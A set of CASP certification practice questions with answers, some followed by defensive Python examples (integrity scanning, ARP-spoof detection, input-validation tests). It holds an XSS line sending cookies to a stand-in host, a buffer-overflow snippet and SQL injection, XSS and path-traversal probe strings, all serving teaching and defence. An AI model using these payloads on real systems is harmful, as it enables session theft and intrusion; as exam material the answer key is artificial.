CASP 1
A company is evaluating a new marketing strategy involving the use of social networking sites to reach its customers. The marketing director wants to be able to report important company news, product updates, and special promotions on the social websites. After an initial and successful pilot period, other departments want to use the social websites to post their updates as well. The Chief Information Officer (CIO) has asked the company security administrator to document three negative security impacts of allowing IT staff to post work related information on such websites. Which of the following are the major risks the security administrator should report back to the CIO? (Select THREE). A. Brute force attacks B. Malware infection C. DDOS attacks D. Phishing attacks E. SQL injection attacks F. Social engineering attacks
B. Malware infection D. Phishing attacks F. Social engineering attacks
The Chief Information Officer (CIO) comes to the security manager and asks what can be done to reduce the potential of sensitive data being emailed out of the company. Which of the following is an active security measure to protect against this threat? A. Require a digital signature on all outgoing emails. B. Sanitize outgoing content. C. Implement a data classification policy. D. Implement a SPAM filter.
B. Sanitize outgoing content.
Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices DoS attacks on the network that are affecting the company's VoIP system (i.e. premature call drops and garbled call signals). The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO). A. Configure 802.11b on the network B. Configure 802.1q on the network C. Configure 802.11e on the network D. Update the firewall managing the SIP servers E. Update the HIDS managing the SIP servers
C. Configure 802.11e on the network D. Update the firewall managing the SIP servers
A system administrator needs to develop a policy for when an application server is no longer needed. Which of the following policies would need to be developed? A. Backup policy B. De-provisioning policy C. Data retention policy D. Provisioning policy
B. De-provisioning policy
Due to a new regulation, a company has to increase active monitoring of security-related events to 24 hours a day. The security staff only has three full time employees that work during normal business hours. Instead of hiring new security analysts to cover the remaining shifts necessary to meet the monitoring requirement, the Chief Information Officer (CIO) has hired a Managed Security Service (MSS) to monitor events. Which of the following should the company do to ensure that the chosen MSS meets expectations? A. Develop a memorandum of understanding on what the MSS is responsible to provide. B. Create internal metrics to track MSS performance. C. Establish a mutually agreed upon service level agreement. D. Issue a RFP to ensure the MSS follows guidelines.
C. Establish a mutually agreed upon service level agreement.
The internal auditor at Company ABC has completed the annual audit of the company's financial system. The audit report indicates that the accounts receivable department has not followed proper record disposal procedures during a COOP/BCP tabletop exercise involving manual processing of financial transactions. Which of the following should be the Information Security Officer's (ISO's) recommendation? (Select TWO). A. Wait for the external audit results B. Perform another COOP exercise C. Implement mandatory training D. Destroy the financial transactions E. Review company procedures
C. Implement mandatory training E. Review company procedures
Employees have recently requested remote access to corporate email and shared drives. Remote access has never been offered; however, the need to improve productivity and respond rapidly to customer demands means staff now require remote access. Which of the following controls will BEST protect the corporate network? A. Develop a security policy that defines remote access requirements. Perform regular audits of user accounts and reviews of system logs. B. Secure remote access systems to ensure shared drives are read only and access is provided through a SSL portal. Perform regular audits of user accounts and reviews of system logs. C. Plan and develop security policies based on the assumption that external environments have active hostile threats. D. Implement a DLP program to log data accessed by users connecting via remote access. Regularly perform user revalidation.
C. Plan and develop security policies based on the assumption that external environments have active hostile threats.
A company has purchased a new system, but security personnel are spending a great deal of time on system maintenance. A new third party vendor has been selected to maintain and manage the company's system. Which of the following document types would need to be created before any work is performed? A. IOS B. ISA C. SLA D. OLA
C. SLA
Based on the results of a recent audit, a company rolled out a standard computer image in an effort to provide consistent security configurations across all computers. Which of the following controls provides the GREATEST level of certainty that unauthorized changes are not occurring? A. Schedule weekly vulnerability assessments B. Implement continuous log monitoring C. Scan computers weekly against the baseline D. Require monthly reports showing compliance with configuration and updates
C. Scan computers weekly against the baseline
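Scanning against the baseline is the only option of the four that compares each host directly with the known-good image rather than inferring its state from reports or log volume. The following is an added example, not code from the page: a minimal file-integrity check that snapshots a tree of files with SHA-256, then classifies drift as modified, missing or unexpected. The directory layout and file contents are constructed stand-ins for what a hardening baseline would pin.

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = sha256_file(full)
    return result


def compare_to_baseline(baseline, current):
    """Classify drift: modified (digest changed), missing (baseline only), unexpected (new file)."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "unexpected": sorted(p for p in current if p not in baseline),
    }


def _write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build a throwaway 'image', record its baseline, tamper with it, and rescan."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed stand-ins for configuration files a standard image would pin.
        _write(root, "etc/ssh/sshd_config", b"PermitRootLogin no\nPasswordAuthentication no\n")
        _write(root, "etc/sudoers", b"root ALL=(ALL:ALL) ALL\n")
        _write(root, "etc/cron.d/audit", b"0 2 * * * root /usr/local/bin/audit\n")
        baseline = snapshot(root)

        # Unauthorized drift: a weakened setting, a removed control, an unapproved addition.
        _write(root, "etc/ssh/sshd_config", b"PermitRootLogin yes\nPasswordAuthentication no\n")
        os.remove(os.path.join(root, "etc/cron.d/audit"))
        _write(root, "etc/cron.d/persist", b"* * * * * root /tmp/.x\n")
        return compare_to_baseline(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths or '-'}")
```

In practice the baseline digests are produced once from the golden image and stored off-host, and the weekly scan is the comparison side only; a scan that reads its baseline from the host being checked can be silenced by the same attacker who changed the file.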
SDLC is being used for the commissioning of a new platform. To provide an appropriate level of assurance the security requirements that were specified at the project origin need to be carried through to implementation. Which of the following would BEST help to determine if this occurred? A. Requirements workshop B. Security development lifecycle (SDL) C. Security requirements traceability matrix (SRTM) D. Secure code review and penetration test
C. Security requirements traceability matrix (SRTM)
A network engineer at Company ABC observes the following raw HTTP request:
GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts&to_date=01-01-0101&Run=Run&UserEntered=dsmith&SessionID=5f04189bc&from_date=31-10-2010&TypesEntered=1 HTTP/1.1
Host: test.example.net
Accept: */*
Accept-Language: en
Connection: close
Cookie: java14=1; java15=1; java16=1; js=1292192278001;
Which of the following should be the engineer's GREATEST concern? A. The HTTPS is not being enforced so the system is vulnerable. B. The numerical encoding on the session ID is limited to hexadecimal characters, making it susceptible to a brute force attack. C. Sensitive data is transmitted in the URL. D. The dates entered are outside a normal range, which may leave the system vulnerable to a denial of service attack.
C. Sensitive data is transmitted in the URL.
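The session ID in the query string is the real problem: URLs end up in browser history, proxy and web-server access logs and the Referer header sent to third-party sites, so the token is effectively disclosed regardless of whether TLS is used. As an added example (not code from the page), the following parses a raw request, reports which sensitive parameters travel in the URL, and shows the header a server should use instead. The request is the one from the question, reconstructed with its line breaks; the list of sensitive parameter names is an assumption for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Parameter names that should never appear in a URL (assumed list for this example).
SENSITIVE_PARAMS = {
    "sessionid", "session", "sid", "token", "password", "passwd", "pwd",
    "apikey", "api_key", "auth", "ssn",
}

# The request from the question, reconstructed as a sample with CRLF line endings.
SAMPLE_REQUEST = (
    "GET /disp_reports.php?SectionEntered=57&GroupEntered=-1&report_type=alerts"
    "&to_date=01-01-0101&Run=Run&UserEntered=dsmith&SessionID=5f04189bc"
    "&from_date=31-10-2010&TypesEntered=1 HTTP/1.1\r\n"
    "Host: test.example.net\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    "Connection: close\r\n"
    "Cookie: java14=1; java15=1; java16=1; js=1292192278001;\r\n"
    "\r\n"
)

# Constructed counter-example: same page, session carried in a cookie instead.
SAFE_REQUEST = (
    "GET /disp_reports.php?SectionEntered=57&report_type=alerts HTTP/1.1\r\n"
    "Host: test.example.net\r\n"
    "Cookie: SessionID=5f04189bc; js=1292192278001;\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, query dict, headers dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, parts.path, parse_qs(parts.query, keep_blank_values=True), headers


def sensitive_params_in_url(raw):
    """Names of query-string parameters that carry data which must not be in a URL."""
    _method, _path, query, _headers = parse_request(raw)
    return sorted(name for name in query if name.lower() in SENSITIVE_PARAMS)


def session_cookie_header(token, name="SessionID"):
    """How the server should issue the session instead: a cookie that is never
    written into URLs, is unreadable to page scripts, and only travels over TLS."""
    return f"Set-Cookie: {name}={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_REQUEST), ("safe", SAFE_REQUEST)):
        print(label, "->", sensitive_params_in_url(raw) or "no sensitive data in URL")
    print(session_cookie_header("5f04189bc"))
```

Run over a day of access logs, the same check is a cheap way to find every endpoint that has drifted into passing tokens as GET parameters; the cookie header shows the fix the development team should apply at the point where the session is issued.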
A security administrator has been conducting a security assessment of Company XYZ for the past two weeks. All of the penetration tests and other assessments have revealed zero flaws in the systems at Company XYZ. However, Company XYZ reports that it has been the victim of numerous security incidents in the past six months. In each of these incidents, the criminals have managed to exfiltrate large volumes of data from the secure servers at the company. Which of the following techniques should the investigation team consider in the next phase of their assessment in hopes of uncovering the attack vector the criminals used? A. Vulnerability assessment B. Code review C. Social engineering D. Reverse engineering
C. Social engineering
A telecommunication company has recently upgraded their teleconference systems to multicast. Additionally, the security team has instituted a new policy which requires VPN to access the company's video conference. All parties must be issued a VPN account and must connect to the company's VPN concentrator to participate in the remote meetings. Which of the following settings will increase bandwidth utilization on the VPN concentrator during the remote meetings? A. IPSec transport mode is enabled B. ICMP is disabled C. Split tunneling is disabled D. NAT-traversal is enabled
C. Split tunneling is disabled
Which of the following should be used with caution because of its ability to provide access to block level data instead of file level data? A. CIFS B. NFS C. iSCSI D. NAS
C. iSCSI
Which of the following displays an example of an XSS attack?
A.
<SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
B.
Checksums-Sha1:
7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc
e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz
d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz
ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb
7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb
b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb
C.
<form action="/cgi-bin/login" method=post>
Username: <input type=text name=username>
Password: <input type=password name=password>
<input type=submit value=Login>
</form>
D.
#include <string.h>
char *code = "AAAABBBBCCCCDDD"; /* including the terminating '\0', size = 16 bytes */
int main(void) { char buf[8]; strcpy(buf, code); return 0; } /* 16 bytes written into an 8-byte buffer */
A. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The network administrator reviews the tickets and compiles the following information for the security administrator:
------
Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0
Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0
Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0
All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a
------
The security administrator brings a laptop to the finance office, connects it to one of the wall jacks, starts up a network analyzer, and notices the following:
09:05:10.937590 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)
09:05:15.934840 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)
09:05:19.931482 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)
Which of the following can the security administrator determine from the above information? A. A man in the middle attack is underway - implementing static ARP entries is a possible solution. B. An ARP flood attack targeted at the router is causing intermittent communication - implementing IPS is a possible solution. C. The default gateway is being spoofed - implementing static routing with MD5 is a possible solution. D. The router is being advertised on a separate network - router reconfiguration is a possible solution.
A. A man in the middle attack is underway - implementing static ARP entries is a possible solution.
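The capture shows the pieces a detector needs: the callers sit in 172.16.34.0/23 (a /23 mask on 172.16.35.x), so 172.16.34.1 is their default gateway, and every few seconds an unsolicited ARP reply binds that gateway IP to 0:12:3f:f1:da:52, which is not the router MAC in the ticket notes. As an added example (not code from the page), the following parses tcpdump-style ARP reply lines, alerts on any reply that conflicts with a pinned gateway MAC, and emits the static ARP entry that neutralises the attack on a host. The capture lines are the ones from the question; treating the upstream interface MAC as the one facing this VLAN, and the interface name in the mitigation command, are assumptions for the example.

```python
import re

# Pinned gateway binding, from the ticket notes (assumed to be the interface facing this VLAN).
KNOWN_GATEWAYS = {"172.16.34.1": "00-01-42-32-ab-1a"}

# The three ARP replies from the capture in the question.
SAMPLE_CAPTURE = [
    "09:05:10.937590 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)",
    "09:05:15.934840 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)",
    "09:05:19.931482 arp reply 172.16.34.1 is-at 0:12:3f:f1:da:52 (0:12:3f:f1:da:52)",
]

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) arp reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-fA-F:-]+)"
)


def normalize_mac(mac):
    """Canonicalise '0:12:3f:f1:da:52' or '00-01-42-32-ab-1a' to 'xx:xx:xx:xx:xx:xx'."""
    octets = re.split(r"[:-]", mac)
    if len(octets) != 6:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(o.lower().zfill(2) for o in octets)


def detect_arp_spoofing(capture_lines, known_gateways=KNOWN_GATEWAYS):
    """Return one alert per ARP reply that binds an IP to a MAC other than the one on record.

    Pinned gateways are trusted from the start, so a single forged reply alerts.
    Any other IP is learned from its first reply and alerts only if it later changes.
    """
    bindings = {ip: normalize_mac(mac) for ip, mac in known_gateways.items()}
    alerts = []
    for line in capture_lines:
        m = ARP_REPLY.match(line)
        if not m:
            continue
        ip, mac = m.group("ip"), normalize_mac(m.group("mac"))
        expected = bindings.setdefault(ip, mac)
        if expected != mac:
            alerts.append({"time": m.group("ts"), "ip": ip, "expected": expected, "observed": mac})
    return alerts


def static_arp_commands(known_gateways=KNOWN_GATEWAYS, dev="eth0"):
    """Linux commands that pin the gateway MAC on an affected host (dev is an assumption)."""
    return [
        f"ip neigh replace {ip} lladdr {normalize_mac(mac)} dev {dev} nud permanent"
        for ip, mac in known_gateways.items()
    ]


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE):
        print(f"{alert['time']} {alert['ip']} expected {alert['expected']} saw {alert['observed']}")
    print("\n".join(static_arp_commands()))
```

Static entries stop the poisoning on the hosts that get them, but they do not scale and are not needed on a switch that supports dynamic ARP inspection, which drops replies whose IP/MAC pair does not match the DHCP snooping binding table; the detector above is the kind of check you run on a span port while the switch feature is being rolled out.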
A security manager at Company ABC, needs to perform a risk assessment of a new mobile device which the Chief Information Officer (CIO) wants to immediately deploy to all employees in the company. The product is commercially available, runs a popular mobile operating system, and can connect to IPv6 networks wirelessly. The model the CIO wants to procure also includes the upgraded 160GB solid state hard drive. The producer of the device will not reveal exact numbers but experts estimate that over 73 million of the devices have been sold worldwide. Which of the following is the BEST list of factors the security manager should consider while performing a risk assessment? A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting security flaws in their products; predicted costs associated with maintaining, integrating and securing the devices. B. Ability to remotely administer the devices, apply security controls remotely, and remove the SSD; the track record of the vendor in securely implementing IPv6 with IPSec; predicted costs associated with securing the devices. C. Ability to remotely monitor the devices, remove security controls remotely, and decrypt the SSD; the track record of the vendor in publicizing and preventing security flaws in their products; predicted costs associated with maintaining, destroying and tracking the devices. D. Ability to remotely sanitize the devices, apply security controls locally, encrypt the SSD; the track record of the vendor in adapting the open source operating system to their platform; predicted costs associated with inventory management, maintaining, integrating and securing the devices.
A. Ability to remotely wipe the devices, apply security controls remotely, and encrypt the SSD; the track record of the vendor in publicizing and correcting security flaws in their products; predicted costs associated with maintaining, integrating and securing the devices.
After implementing port security, restricting all network traffic into and out of a network, migrating to IPv6, installing NIDS, firewalls, spam and application filters, a security administrator is convinced that the network is secure. The administrator now focuses on securing the hosts on the network, starting with the servers. Which of the following is the MOST complete list of end-point security software the administrator could plan to implement? A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, two-factor authentication. B. Anti-virus/spyware/spam software, as well as a host based IDS, firewall, and strong three-factor authentication. C. Anti-malware/virus/spyware/spam software, as well as a host based firewall and biometric authentication. D. Anti-malware/spam software, as well as a host based firewall and strong, three-factor authentication.
A. Anti-malware/virus/spyware/spam software, as well as a host based firewall and strong, two-factor authentication.
A data breach occurred which impacted the HR and payroll system. It is believed that an attack from within the organization resulted in the data breach. Which of the following should be performed FIRST after the data breach occurred? A. Assess system status B. Restore from backup tapes C. Conduct a business impact analysis D. Review NIDS logs
A. Assess system status
The Chief Executive Officer (CEO) has decided to outsource systems which are not core business functions; however, a recent review by the risk officer has indicated that core business functions are dependent on the outsourced systems. The risk officer has requested that the IT department calculates the priority of restoration for all systems and applications under the new business model. Which of the following is the BEST tool to achieve this? A. Business impact analysis B. Annualized loss expectancy analysis C. TCO analysis D. Residual risk and gap analysis
A. Business impact analysis
A replacement CRM has had its business case approved. In preparation for a requirements workshop, an architect is working with a business analyst to ensure that appropriate security requirements have been captured. Which of the following documents BEST captures the security requirements? A. Business requirements document B. Requirements traceability matrix document C. Use case and viewpoints document D. Solution overview document
A. Business requirements document
On Monday, the Chief Information Officer (CIO) of a state agency received an e-discovery request for the release of all emails sent and received by the agency board of directors for the past five years. The CIO has contacted the email administrator and asked the administrator to provide the requested information by end of day on Friday. Which of the following has the GREATEST impact on the ability to fulfill the e-discovery request? A. Data retention policy B. Backup software and hardware C. Email encryption software D. Data recovery procedures
A. Data retention policy
A security analyst at Company A has been trying to convince the Information Security Officer (ISO) to allocate budget towards the purchase of a new intrusion prevention system (IPS) capable of analyzing encrypted web transactions. Which of the following should the analyst provide to the ISO to support the request? (Select TWO). A. Emerging threat reports B. Company attack trends C. Request for Quote (RFQ) D. Best practices E. New technologies report
A. Emerging threat reports B. Company attack trends
A security manager has provided a Statement of Work (SOW) to an external penetration testing firm for a web application security test. The web application starts with a very simple HTML survey form with two components: a country selection dropdown list and a submit button. The penetration testers are required to provide their test cases for this survey form in advance. In order to adequately test the input validation of the survey form, which of the following tools would be the BEST tool for the technician to use? A. HTTP interceptor B. Vulnerability scanner C. Port scanner D. Fuzzer
A. HTTP interceptor
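A dropdown constrains what the browser offers, not what the server receives: with an HTTP interceptor the tester replaces the selected value in the POST body with whatever the test plan calls for, which is why the test cases can be written down in advance. As an added example (not code from the page), the following lists the kind of cases such a plan would contain and runs them against a validator that trusts the dropdown and against one that enforces a server-side allow-list. The country codes and the test strings are constructed for the example.

```python
import re

# The values the survey dropdown actually offers (ISO 3166-1 alpha-2 codes; subset chosen for the example).
ALLOWED_COUNTRIES = {"US", "CA", "GB", "DE", "FR", "JP", "BR", "IN"}

# Test cases an HTTP interceptor submits in place of the dropdown value (constructed).
INTERCEPTOR_TEST_CASES = [
    "US",                          # legitimate value
    "us ",                         # case/whitespace variant
    "ZZ",                          # well-formed but not offered
    "",                            # empty field
    "US,CA",                       # multiple values in one field
    "' OR '1'='1",                 # SQL injection probe
    "<script>alert(1)</script>",   # XSS probe
    "../../etc/passwd",            # path traversal probe
    "US\r\nSet-Cookie: x=y",       # header injection probe
    "A" * 4096,                    # length probe
]


def validate_country_weak(value):
    """Vulnerable: assumes a dropdown can only ever send one of its options."""
    return value


def validate_country(value):
    """Hardened: canonicalise, check the shape, then enforce the server-side allow-list."""
    if not isinstance(value, str):
        raise ValueError("country must be a string")
    code = value.strip().upper()
    if not re.fullmatch(r"[A-Z]{2}", code):
        raise ValueError("country must be two letters")
    if code not in ALLOWED_COUNTRIES:
        raise ValueError("country not in allow-list")
    return code


def run_test_cases(validator, cases=INTERCEPTOR_TEST_CASES):
    """Apply a validator to every case; map case -> ('accepted', value) or ('rejected', reason)."""
    results = {}
    for case in cases:
        try:
            results[case] = ("accepted", validator(case))
        except ValueError as exc:
            results[case] = ("rejected", str(exc))
    return results


def accepted(validator, cases=INTERCEPTOR_TEST_CASES):
    """The subset of cases a validator lets through; a long list here is the finding."""
    return [c for c, (verdict, _) in run_test_cases(validator, cases).items() if verdict == "accepted"]


if __name__ == "__main__":
    print("weak validator accepts:", len(accepted(validate_country_weak)), "of", len(INTERCEPTOR_TEST_CASES))
    print("hardened validator accepts:", accepted(validate_country))
```

The same case list doubles as the expected-results table the tester hands back: each tampered value should map to a rejection, and any that the application accepts (or that produces a stack trace instead of a clean rejection) is a reportable weakness in input validation.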
The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the internal network. The Chief Information Security Officer (CISO) was told to research and recommend how to secure this device. Which of the following should be implemented, keeping in mind that the CEO has stated that this access is required? A. Mitigate and Transfer B. Accept and Transfer C. Transfer and Avoid D. Avoid and Mitigate
A. Mitigate and Transfer
An online banking application has had its source code updated and is soon to be re-launched. The underlying infrastructure has not been changed. In order to ensure that the application has an appropriate security posture, several security-related activities are required. Which of the following security activities should be performed to provide an appropriate level of security testing coverage? (Select TWO). A. Penetration test across the application with accounts of varying access levels (i.e. non-authenticated, authenticated, and administrative users). B. Code review across critical modules to ensure that security defects, Trojans, and backdoors are not present. C. Vulnerability assessment across all of the online banking servers to ascertain host and container configuration lock-down and patch levels. D. Fingerprinting across all of the online banking servers to ascertain open ports and services. E. Black box code review across the entire code base to ensure that there are no security defects present.
A. Penetration test across the application with accounts of varying access levels (i.e. non-authenticated, authenticated, and administrative users). B. Code review across critical modules to ensure that security defects, Trojans, and backdoors are not present.
The security administrator is worried about possible SPIT attacks against the VoIP system. Which of the following security controls would MOST likely need to be implemented to detect this type of attack? A. SIP and SRTP traffic analysis B. QoS audit on Layer 3 devices C. IP and MAC filtering logs D. Email spam filter log
A. SIP and SRTP traffic analysis
The company is about to upgrade a financial system through a third party, but wants to legally ensure that no sensitive information is compromised throughout the project. The project manager must also make sure that internal controls are set to mitigate the potential damage that one individual's actions may cause. Which of the following needs to be put in place to make certain both organizational requirements are met? (Select TWO). A. Separation of duties B. Forensic tasks C. MOU D. OLA E. NDA F. Job rotation
A. Separation of duties E. NDA
A production server has been compromised. Which of the following is the BEST way to preserve the non-volatile evidence? A. Shut the server down and image the hard drive. B. Remove all power sources from the server. C. Install remote backup software and copy data to write-once media. D. Login remotely and perform a full backup of the server.
A. Shut the server down and image the hard drive.
Which of the following is true about an unauthenticated SAMLv2 transaction? A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access. B. The browser asks the IdP for a resource. The IdP provides the browser with an XHTML format. The browser asks the SP to validate the user, and then provides the XHTML to the IdP for access. C. The browser asks the IdP to validate the user. The IdP sends an XHTML form to the SP and a cookie to the browser. The browser asks for a resource to the SP, which verifies the cookie and XHTML format for access. D. The browser asks the SP to validate the user. The SP sends an XHTML form to the IdP. The IdP provides the XHTML form back to the SP, and then the browser asks the SP for a resource.
A. The browser asks the SP for a resource. The SP provides the browser with an XHTML format. The browser asks the IdP to validate the user, and then provides the XHTML back to the SP for access.
A newly-appointed risk management director for the IT department at Company XYZ, a major pharmaceutical manufacturer, needs to conduct a risk analysis regarding a new system which the developers plan to bring on-line in three weeks. The director begins by reviewing the thorough and well-written report from the independent contractor who performed a security assessment of the system. The report details what seems to be a manageable volume of infrequently exploited security vulnerabilities. The likelihood of a malicious attacker exploiting one of the vulnerabilities is low; however, the director still has some reservations about approving the system because of which of the following? A. The resulting impact of even one attack being realized might cripple the company financially. B. Government health care regulations for the pharmaceutical industry prevent the director from approving a system with vulnerabilities. C. The director is new and is being rushed to approve a project before an adequate assessment has been performed. D. The director should be uncomfortable accepting any security vulnerabilities and should find time to correct them before the system is deployed.
A. The resulting impact of even one attack being realized might cripple the company financially.
A security administrator has finished building a Linux server which will host multiple virtual machines through hypervisor technology. Management of the Linux server, including monitoring server performance, is achieved through a third party web enabled application installed on the Linux server. The security administrator is concerned about vulnerabilities in the web application that may allow an attacker to retrieve data from the virtual machines. Which of the following will BEST protect the data on the virtual machines from an attack? A. The security administrator must install the third party web enabled application in a chroot environment. B. The security administrator must install a software firewall on both the Linux server and the virtual machines. C. The security administrator must install anti-virus software on both the Linux server and the virtual machines. D. The security administrator must install the data exfiltration detection software on the perimeter firewall.
A. The security administrator must install the third party web enabled application in a chroot environment.
Driven mainly by cost, many companies outsource computing jobs which require a large amount of processor cycles over a short duration to cloud providers. This allows the company to avoid a large investment in computing resources which will only be used for a short time. Assuming the provisioned resources are dedicated to a single company, which of the following is the MAIN vulnerability associated with on-demand provisioning? A. Traces of proprietary data which can remain on the virtual machine and be exploited B. Remnants of network data from prior customers on the physical servers during a compute job C. Exposure of proprietary data when in-transit to the cloud provider through IPSec tunnels D. Failure of the de-provisioning mechanism resulting in excessive charges for the resources
A. Traces of proprietary data which can remain on the virtual machine and be exploited
A company currently does not use any type of authentication or authorization service for remote access. The new security policy states that all remote access must be locked down to only authorized personnel. The policy also dictates that only authorized external networks will be allowed to access certain internal resources. Which of the following would MOST likely need to be implemented and configured on the company's perimeter network to comply with the new security policy? (Select TWO). A. VPN concentrator B. Firewall C. Proxy server D. WAP E. Layer 2 switch
A. VPN concentrator B. Firewall
A security architect is assigned to a major software development project. The software development team has a history of writing bug prone, inefficient code, with multiple security flaws in every release. The security architect proposes implementing secure coding standards to the project manager. The secure coding standards will contain detailed standards for: A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems. B. error prevention, requirements validation, memory use and reuse, commenting typical security problems, and testing code standards. C. error elimination, trash collection, documenting race conditions, peer review, and typical security problems. D. error handling, input validation, commenting, preventing typical security problems, managing customers, and documenting extra requirements.
A. error handling, input validation, memory use and reuse, race condition handling, commenting, and preventing typical security problems.
Company Z is merging with Company A to expand its global presence and consumer base. This purchase includes several offices in different countries. To maintain strict internal security and compliance requirements, all employee activity may be monitored and reviewed. Which of the following would be the MOST likely cause for a change in this practice? A. The excessive time it will take to merge the company's information systems. B. Countries may have different legal or regulatory requirements. C. Company A might not have adequate staffing to conduct these reviews. D. The companies must consolidate security policies during the merger.
B. Countries may have different legal or regulatory requirements.
An internal employee has sold a copy of the production customer database that was being used for upgrade testing to outside parties via HTTP file upload. The Chief Information Officer (CIO) has resigned and the Chief Executive Officer (CEO) has tasked the incoming CIO with putting effective controls in place to help prevent this from occurring again in the future. Which of the following controls is the MOST effective in preventing this threat from re-occurring? A. Network-based intrusion prevention system B. Data loss prevention C. Host-based intrusion detection system D. Web application firewall
B. Data loss prevention
The Chief Executive Officer (CEO) of a corporation decided to move all email to a cloud computing environment. The Chief Information Security Officer (CISO) was told to research the risk involved in this environment. Which of the following measures should be implemented to minimize the risk of hosting email in the cloud? A. Remind users that all emails with sensitive information need to be encrypted and physically inspect the cloud computing environment. B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider. C. Ensure logins are over an encrypted channel and remind users to encrypt all emails that contain sensitive information. D. Obtain an NDA from the cloud provider and remind users that all emails with sensitive information need to be encrypted.
B. Ensure logins are over an encrypted channel and obtain an NDA and an SLA from the cloud provider.
The company's marketing department needs to provide more real-time interaction with its partners and consumers and decides to move forward with a presence on multiple social networking sites for sharing information. Which of the following minimizes the potential exposure of proprietary information? A. Require each person joining the company's social networking initiative to accept a nondisclosure agreement. B. Establish a specific set of trained people that can release information on the organization's behalf. C. Require a confidential statement be attached to all information released to the social networking sites. D. Establish a social media usage policy and provide training to all marketing employees.
B. Establish a specific set of trained people that can release information on the organization's behalf.
As part of the testing phase in the SDLC, a software developer wants to verify that an application is properly handling user error exceptions. Which of the following is the BEST tool or process for the developer to use? A. SRTM review B. Fuzzer C. Vulnerability assessment D. HTTP interceptor
B. Fuzzer
An employee was terminated and promptly escorted to their exit interview, after which the employee left the building. It was later discovered that this employee had started a consulting business using screen shots of their work at the company which included live customer data. This information had been removed through the use of a USB device. After this incident, it was determined a process review must be conducted to ensure this issue does not recur. Which of the following business areas should primarily be involved in this discussion? (Select TWO). A. Database Administrator B. Human Resources C. Finance D. Network Administrator E. IT Management
B. Human Resources E. IT Management
An IT administrator has installed new DNS name servers (Primary and Secondary), which are used to host the company MX records and resolve the web server's public address. In order to secure the zone transfer between the primary and secondary server, the administrator uses only server ACLs. Which of the following attacks could the secondary DNS server still be susceptible to? A. Email spamming B. IP spoofing C. Clickjacking D. DNS replication
B. IP spoofing
Company ABC has recently completed the connection of its network to a national high speed private research network. Local businesses in the area are seeking sponsorship from Company ABC to connect to the high speed research network by directly connecting through Company ABC's network. Company ABC's Chief Information Officer (CIO) believes that this is an opportunity to increase revenues and visibility for the company, as well as promote research and development in the area. Which of the following must Company ABC require of its sponsored partners in order to document the technical security requirements of the connection? A. SLA B. ISA C. NDA D. BPA
B. ISA
